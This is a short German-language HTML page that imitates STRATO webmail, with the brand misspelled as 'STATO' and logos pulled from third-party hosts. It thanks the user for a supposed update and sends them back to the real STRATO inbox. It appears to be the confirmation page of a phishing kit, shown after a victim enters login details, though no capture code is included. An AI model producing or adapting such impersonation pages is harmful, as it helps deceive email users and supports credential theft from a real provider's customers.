<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="https://www.odrive.com/images/links/logos/hidrive.png">
	<meta charset="UTF-8">
	<title>Unterstützung - STATO </title>
	<link href="style.css" rel="stylesheet">
</head>
<body>

<p>
<p>
<p>
<p>
<div class="login-page">
<div class="form">

<img "left" alt="STATO |"src="https://upload.wikimedia.org/wikipedia/commons/f/f4/Strato_logo.jpg" width="200" height="45">
<br>
<div style="background-color:Royale Blue">
<h5>Vielen Dank für die Aktualisierung auf die neueste Version!</h5>
<h5>Sie können sich entspannen, wenn Sie wissen, dass wir unsere Server warten, sodass Sie von zuverlässigen E-Mails ohne Verwaltungsprobleme profitieren können.</h5>
</div>
<p>
<a href="https://webmail.strato.com/appsuite/ui#!!&app=io.ox/mail&folder=default0/INBOX"><button>Geh zurück zu <span style='font-size:17px;'>&#8680;</span> Posteingang </button>
<br>
<p>
   <img "left" alt="STATO Mail"src="https://www.ionos.com/help/fileadmin/icons/Start_Page/partner_portal_icon.svg" width="80" height="80">
<br>
